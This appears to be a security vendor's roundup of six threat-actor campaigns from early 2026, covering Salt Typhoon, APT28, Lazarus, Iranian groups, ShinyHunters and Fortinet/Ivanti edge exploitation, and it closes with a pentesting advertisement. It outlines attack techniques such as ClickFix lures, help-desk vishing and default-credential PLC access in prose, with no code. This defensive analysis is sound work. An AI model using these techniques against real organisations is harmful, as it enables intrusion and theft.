The first four months of 2026 produced a dense, unusually consequential APT cycle. China's Salt Typhoon expanded from US telecom espionage into a global telecom mapping campaign hitting Singapore, Norway, and Canada. Russia's APT28 ran an aggressive Roundcube webmail campaign against Ukrainian institutions and accidentally left their entire toolkit on a publicly accessible server. North Korea's Lazarus cluster pulled more than $500M in DeFi heists in a single two-week window and shipped a polished new macOS implant aimed at crypto-firm executives. Iranian MOIS and IRGC-affiliated actors entered a clear post-strike retaliation phase against US and Israeli targets. ShinyHunters and the related UNC6395 cluster turned the Salesforce / Salesloft Drift compromise into a ~1.5-billion-record SaaS extortion campaign. And the structural problem of internet-facing edge devices kept producing unpatched-zero-day disasters at Fortinet and Ivanti.
This is a synthesized roundup of those six campaigns — what each is doing, who is doing it, what the TTPs look like, and why each one matters for defenders this quarter. Where attribution is contested or evidence is partial, we say so explicitly. Sources are inline.
Salt Typhoon — Telecom Espionage Goes Global
| Names | Salt Typhoon (Microsoft); GhostEmperor (Kaspersky lineage); RedMike (Recorded Future) |
| Attribution | Operated by China's Ministry of State Security per joint US/UK/Canada/Australia/NZ assessments. High-confidence and uncontested at the state-actor level. |
| Recent activity | February 2026: all four of Singapore's national telecoms confirmed breached. Norway disclosed multiple telecom intrusions same month. Canada confirmed a previously-undisclosed mid-Feb intrusion at an unnamed carrier via three Cisco devices. |
The standout development this quarter is the geographic expansion. The 2024 Salt Typhoon revelations focused on US carriers (AT&T, Verizon, T-Mobile, Lumen). February 2026 confirmed that the same actor has been doing the same thing globally — Singapore, Norway, Canada — with a clear pattern of targeting carriers in NATO-aligned, Five Eyes-adjacent, and strategic-ally jurisdictions.
FBI Deputy Assistant Director Michael Machtinger publicly stated in February that Salt Typhoon's threat is "still very much present" — meaning the 2024 US victims were never fully evicted. Senator Maria Cantwell (Senate Commerce Committee) wrote in February that there is "no reason to think the attack has been completely remediated." If you internalize one thing from this entire roundup: the dwell time on this campaign is years, eviction is hard, and the network gear it lives on is invisible to your EDR.
TTPs
- Initial access: unpatched Cisco IOS XE devices (CVE-2023-20198 / 20273 and successors), edge routers, provider-edge switches.
- Post-exploitation: GhostSpider modular backdoor, Masol RAT, custom Cisco IOS implants modifying running-config and TACACS+/RADIUS handlers to harvest credentials in transit.
- Persistence: lives in network-device firmware where EDR cannot reach; abuses lawful-intercept (CALEA) interfaces on carrier gear to access call-detail records and wiretap surfaces.
- Exfiltration: metadata and signaling traffic siphoned over operator-trusted GRE tunnels to attacker infrastructure.
Sources: TechCrunch — who has been hacked; Dark Reading — Canada; CyberScoop — FBI on ongoing threat.
APT28 / Fancy Bear — Operation Roundish + the OPSEC Blunder
| Names | APT28 (Mandiant); Fancy Bear (CrowdStrike); Forest Blizzard / STRONTIUM (Microsoft); Sednit (ESET) |
| Attribution | GRU Unit 26165. High-confidence, uncontested. |
| Recent activity | Jan-Mar 2026: exposed open directory at 203.161.50[.]145:8889 revealed full Roundcube exploitation toolkit. Mar-Apr: 170+ Ukrainian prosecutor and law-enforcement accounts compromised. Parallel reporting on Microsoft Office CVE-2026-21509 / -32202 and PRISMEX malware deployment. |
Two things happened to APT28 this quarter that rarely happen to GRU operations. First, an active operator left a server's directory listing open between January and March, and Hunt.io and Ctrl-Alt-Intel pulled out the complete Roundcube webmail exploitation toolkit, stolen credentials, 2FA seeds, and operator activity logs. It is the rare case where defenders got near-real-time visibility into a live GRU operation.
Second, CERT-UA documented an aggressive intensification of Roundcube and Office-document attacks against Ukrainian municipal and prosecutorial institutions: 170+ accounts at the Specialized Prosecutor's Office in the Field of Defense, the Asset Recovery and Management Agency, Kyiv-area law enforcement, and a parallel set of compromises in Romania, Greece, Serbia, Bulgaria, and North Macedonia. The targeting tracks Russia's military priority list precisely — anyone supplying, training, or prosecuting on behalf of Ukraine.
TTPs
- Initial access: Roundcube XSS/RCE chains against internet-facing webmail; weaponized Office documents (CVE-2026-21509 + the incomplete-patch follow-up CVE-2026-32202); credential phishing with adversary-in-the-middle.
- Post-exploitation: PRISMEX implant, increasingly cloud-native C2 hosted on legitimate cloud providers.
- Persistence: OAuth token theft, app passwords, mailbox forwarding rules.
- Exfiltration: webmail-native — pulls inbox contents directly via IMAP after credential capture, which looks identical to legitimate user activity.
The defender lesson is straightforward: if you run Roundcube or any internet-facing webmail, treat it as actively-targeted critical infrastructure. The patching latency that worked in 2022 is not survivable in 2026.
Sources: Hunt.io — Operation Roundish; Ctrl-Alt-Intel — FancyBear OPSEC blunder; The Record — Ukraine prosecutor campaign; The Hacker News — PRISMEX.
Lazarus / TraderTraitor — "Mach-O Man" and $500M+ in DeFi Heists
| Names | Lazarus (umbrella); TraderTraitor, APT38, BlueNoroff, Famous Chollima (sub-clusters); Diamond Sleet / Jade Sleet (Microsoft); Hidden Cobra (CISA) |
| Attribution | DPRK Reconnaissance General Bureau. State-level attribution: high-confidence. Sub-cluster delineation: contested between vendors. |
| Recent activity | Mar 1: Bitrefill compromise. Apr 18: ~$292M stolen from Kelp DAO. Separate Drift exploit pushed combined April losses past $500M. Apr 22: CertiK discloses "Mach-O Man" macOS campaign targeting fintech and crypto executives. |
The cumulative theft attributed to Lazarus since 2017 is now estimated at $6.7 billion. This is a state revenue program that funds the DPRK weapons program, not a hobby. The April 2026 spike is consistent with the longer-run trend — quarterly take is up, target acquisition is more sophisticated, and macOS is no longer a safe haven for crypto-firm leadership.
The "Mach-O Man" campaign, disclosed by CertiK on April 22, is the most operationally interesting development. The initial-access tradecraft is ClickFix — Telegram-delivered fake meeting invites that appear to be Zoom, Teams, or Meet, instructing the target to paste a "fix" command into Terminal to resolve a fake audio or camera issue. Targets paste, the implant lands, and the operator has macOS Terminal-tier access to corporate SaaS sessions, signing keys, and crypto wallets.
TTPs
- Initial access: ClickFix social engineering via Telegram-impersonated meeting invites; targeted spear-phishing against executives at fintech and crypto firms.
- Post-exploitation: modular macOS implant ("Mach-O Man") providing access to corporate SaaS, signing keys, and crypto wallets.
- Persistence: abuse of legitimate macOS launch agents; the implant is engineered to self-erase post-objective, which is why incident timelines are hard to reconstruct.
- Exfiltration: wallet seed extraction, OAuth token theft, signing-key abuse to authorize on-chain transactions from compromised admin sessions.
Sources: CoinDesk — Mach-O Man; CoinDesk — Bitrefill; SCMP — Kelp DAO; ANY.RUN — Mach-O Man technical analysis.
Iranian APTs — Post-Strike Retaliation Wave
| Names | MuddyWater (Mango Sandstorm / Static Kitten); APT34 / OilRig (Hazel Sandstorm); IRGC-affiliated OT cluster (named in CISA AA26-097A) |
| Attribution | Iran's MOIS (MuddyWater, APT34) and IRGC (OT cluster). State-level attribution: high-confidence. MuddyWater/APT34 line is sometimes blurred by analysts. |
| Trigger | Late February 2026: coordinated US-Israeli kinetic strikes against IRGC and MOIS leadership and nuclear infrastructure. |
| Recent activity | MuddyWater's RustyWater RAT against Israeli government, military, financial, telecom, and maritime sectors. Same actor with new Dindoor (Deno-based) and Fakeset (Python) implants on US bank, airport, nonprofit, and defense-adjacent targets. APT34 against Iraqi government via Veaty / Spearal (Dark Scepter cluster). Apr 7: CISA + FBI + NSA + EPA joint advisory AA26-097A on IRGC-affiliated OT/PLC targeting. |
This is the most operationally urgent set of advisories in the spring window. CISA explicitly says targeting "has recently escalated, likely in response to hostilities," and the joint AA26-097A advisory names the water/wastewater, energy, and government-services sectors as priority targets. The initial access pattern is depressingly familiar — internet-exposed Rockwell Automation / Allen-Bradley PLCs with default or weak credentials — the same pattern as CyberAv3ngers in 2023.
The MuddyWater tradecraft evolution is interesting independently of the geopolitical trigger: RustyWater (Rust-based RAT, evasion-focused) is now in production deployment against Israeli targets, and Dindoor (Deno JavaScript runtime, deliberately unusual choice) plus Fakeset (Python) are seen on US targets. The Deno choice is operationally clever — most existing IOC and string-based detection assumes Node.js.
TTPs
- Initial access: internet-exposed PLCs with default/weak credentials (the OT cluster); spear-phishing with weaponized Office documents (MuddyWater); multi-stage social engineering with long-lead persona development.
- Post-exploitation: RustyWater (Rust), Dindoor (Deno), Fakeset (Python), Veaty / Spearal (older APT34 toolkit).
- Persistence: in OT environments, modification of PLC project files and HMI displays — the goal is disruption, not just espionage.
- Exfiltration: secondary to disruption in OT cases; standard HTTPS C2 from IT-side compromises.
If you operate water, wastewater, energy, or municipal-government infrastructure, treat AA26-097A as an immediate work item this week.
Sources: CISA Advisory AA26-097A; Trellix — Iranian Cyber Capability 2026; Rescana — RustyWater MuddyWater Israel campaign; Cybersecurity Dive — water/energy targeting.
ShinyHunters / UNC6040 (+ UNC6395) — SaaS Extortion at Industrial Scale
| Names | ShinyHunters (extortion brand); UNC6040 (Mandiant cluster — vishing-led Salesforce intrusions); UNC6395 (Salesloft Drift OAuth-token cluster). Some overlap with Scattered Spider tradecraft per ReliaQuest, but the relationship is contested. |
| Attribution | Financially-motivated criminal actor; APT-grade by virtue of impact and operational tempo, not state nexus. |
| Recent activity | Feb 2026: Wynn Resorts (~800K records claimed); Figure (~967K users). Mar 7-9: Salesforce advisory + ShinyHunters claims responsibility. Mar 2026: Telus + Telus Digital - ~1 PB claimed exfiltrated, $65M ransom demand. Cumulative Drift OAuth campaign: ~1.5B Salesforce records, 760 organizations. |
ShinyHunters is the public-facing brand; the technical work is split across two distinct Mandiant-tracked clusters. UNC6040 runs the vishing-into-help-desk plays where the operator calls a target and walks them through approving a malicious Data Loader OAuth app. Full attack chain in 24-48 hours. UNC6395 runs the Salesloft Drift OAuth-token compromise — tokens stolen from a Salesloft GitHub compromise were used between August 8-18, 2025 to query Salesforce instances at ~760 organizations and pull ~1.5 billion records.
The two big lessons: SaaS supply-chain compromise via stolen OAuth tokens now achieves the blast radius previously reserved for the 2023-era MFT mass-exploits (MOVEit, GoAnywhere, Cleo). Help-desk vishing remains shockingly effective against Fortune 500 IT — the fact that this exists in 2026 is itself a finding. The FBI's recent FLASH alert is unusual in calling out two distinct UNC clusters under one extortion brand.
TTPs
- Initial access (UNC6040): voice phishing — caller impersonates IT, walks the target through approving a malicious connected Data Loader app or surrendering MFA.
- Initial access (UNC6395): stolen OAuth tokens for Salesloft Drift (the AI chatbot with broad Salesforce scopes).
- Post-exploitation: weaponized legitimate Salesforce Data Loader / custom connected apps; Aura framework misconfiguration abuse.
- Persistence: the connected app itself — survives password and MFA resets until the OAuth grant is revoked.
- Exfiltration: SOQL queries via the Salesforce API, pulled to attacker infrastructure. Often invisible because it looks like normal API traffic.
Sources: Cybersecurity Dive — FBI FLASH; SC World — 1.5B records via Drift; The Register — ShinyHunters claims; Mitiga — technical breakdown.
Edge-Device Zero-Day Exploitation Wave — Fortinet, Ivanti, Multiple Actors
| Attribution | Multi-actor exploitation cluster, not a single group. Mandiant attributes the post-exploitation persistence to a "China-nexus espionage actor" with overlap to Volt Typhoon / UNC5221 lineage. Attribution to a specific named group is contested for some Q1 2026 Ivanti waves; CISA stays neutral on attribution. |
| Recent activity | Jan 29: Ivanti CVE-2026-1281 + CVE-2026-1340 (EPMM, both CVSS 9.8 RCE) — both exploited before patch. Feb 6: Fortinet CVE-2026-21643 (FortiClient EMS, unauth RCE). Mar 31: watchTowr observes in-the-wild exploitation of CVE-2026-35616 (FortiClient EMS, CVSS 9.8) before the April 4 vendor advisory. Apr: Mandiant reports earlier victims seeing evolved persistence that survives firmware updates. |
This is not a single campaign — it is the continuation of the structural problem we have been writing about for months: edge devices and management consoles are simultaneously (a) internet-exposed, (b) running custom firmware that EDR cannot see, and (c) trusted enough to push code to everything else they manage. The watchTowr finding is the recurring pattern that defenders should expect to keep happening: exploitation observed four days before the vendor advisory dropped, then opportunistic scanning during the patching gap, then long-tail compromises on unpatched instances for months afterward.
The Mandiant report on evolved persistence is the more concerning side-channel finding: victims of the earlier Fortinet/Ivanti zero-days are seeing implants that survive firmware updates. If you patched in January or February and assumed remediation was complete, you may want to revisit that assumption with active hunting. Patching does not equal eviction for high-end actors on edge devices.
TTPs
- Initial access: N-day and 0-day RCE in MDM consoles (Ivanti EPMM) and endpoint-management consoles (FortiClient EMS) — boxes that by definition manage all your other endpoints.
- Post-exploitation: webshell drop, then movement to internal directory services; in some cases pushing malicious profiles back out to the very endpoints the compromised MDM/EMS was supposed to manage.
- Persistence: firmware-resident implants, scheduled-task hiding, abuse of legitimate management agents.
- Exfiltration: standard HTTPS to attacker infrastructure; in espionage cases, very low-volume staged pulls.
Sources: CyberScoop — Fortinet CVE-2026-35616; watchTowr — technical writeup; Tenable — Ivanti EPMM; CSO Online — evolved persistence.
Cross-Cutting Themes
Three patterns hold across these six campaigns. Each one corresponds to a structural problem in how we build and operate corporate IT in 2026, and each one has implications for how you should be testing your environment.
Theme 01: Edge devices, management consoles, and network gear remain the dominant initial-access vector for both nation-state and high-end criminal actors
Salt Typhoon lives on Cisco gear. APT28 lives in Roundcube. Iran lives in PLCs. The Fortinet/Ivanti cluster lives in MDM and EMS consoles. None of these boxes typically run EDR; all of them are internet-exposed by design. Until the architectural reality changes, this is where the breach is going to start. The continuous-pentesting work of treating edge and management surfaces as Tier-0 attack surface is now mandatory, not optional.
Theme 02: SaaS supply-chain and OAuth-token abuse has reached scale-equivalence with the 2023-era MFT mass-exploits
The Salesloft Drift compromise touched 760 organizations and ~1.5 billion Salesforce records off a single OAuth integration. ShinyHunters then layered vishing on top to extract from the same victim pool. Lazarus is using the same conceptual move on the macOS side — gain Terminal access once, harvest every SaaS session and signing key the executive has. The lesson for defenders: connected-app inventory and OAuth-grant review are now table-stakes, not advanced.
Theme 03: Post-disclosure does not equal post-incident
The most under-appreciated theme of this window is that Salt Typhoon victims from 2024 have not been evicted (FBI February 2026), Fortinet/Ivanti victims are seeing implants that survive patches (Mandiant), and APT28's compromise of Ukrainian institutions continues even after the actor's own C2 server got pwned by researchers. Treat any "we have remediated" comms — yours or your vendors' — with calibrated skepticism. The presumption should be that high-end actors stay until they are forcibly removed, not until they are publicly named.
Honest Uncertainty Notes
Where attribution is fuzzy in this roundup, we want it on the page. A few notes:
- Sub-cluster attribution within Lazarus (TraderTraitor vs. BlueNoroff vs. Famous Chollima for specific 2026 heists) is messy and vendor-dependent. We attributed per the most-cited public source.
- The ShinyHunters / Scattered Spider relationship is reported by ReliaQuest as collaboration but other vendors treat them as distinct. We have kept them separate.
- The April 2026 Iran wave's tie to the Feb 2026 US-Israeli strikes is the framing CISA and Trellix have publicly adopted; some of the underlying activity (Dindoor, Fakeset on US targets) pre-dates the strikes back to early February, so causation is partial.
- CVE-2026-35616 exploitation timeline: watchTowr's "exploited before disclosure" claim relies on their proprietary Attacker Eye sensor; second-source confirmation is currently limited to the CISA KEV entry.
- The "China-nexus" framing for the Fortinet/Ivanti cluster is Mandiant's analytic assessment, not US-government attribution.
Continuous Testing Against the Threat Landscape That Actually Exists.
If your security testing cadence is built for the 2018 threat landscape, you are not testing against the actors that are actually compromising organizations like yours in 2026. Lorikeet Security's continuous pentesting model includes KEV-matched re-testing within hours of CVE disclosure, edge-device and OAuth-grant inventory as standard scope items, and adversary-simulation engagements aligned to current TTPs. Book a scoping call.
